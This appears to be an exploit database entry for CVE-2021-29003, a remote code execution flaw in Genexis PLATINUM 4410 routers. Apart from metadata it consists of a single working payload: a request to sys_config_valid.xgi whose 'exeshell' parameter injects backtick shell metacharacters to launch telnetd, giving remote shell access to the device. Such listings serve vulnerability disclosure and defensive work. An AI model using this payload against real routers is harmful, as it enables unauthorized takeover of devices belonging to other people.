[] NeoSense

Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE

Author: Jay Sharma
type: webapps
platform: hardware
port: 
date_added: 2021-04-14 
date_updated: 2021-04-14 
verified: 0 
codes: CVE-2021-29003 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE
# Date: 12-4-2021
# Exploit Author: Jay Sharma
# Version: Genexis PLATINUM 4410 2.1 P4410-V2-1.28
# Tested on: V2.1
# CVE : CVE-2021-29003

#steps to reproduce#

Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the http://x.x.x.x/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI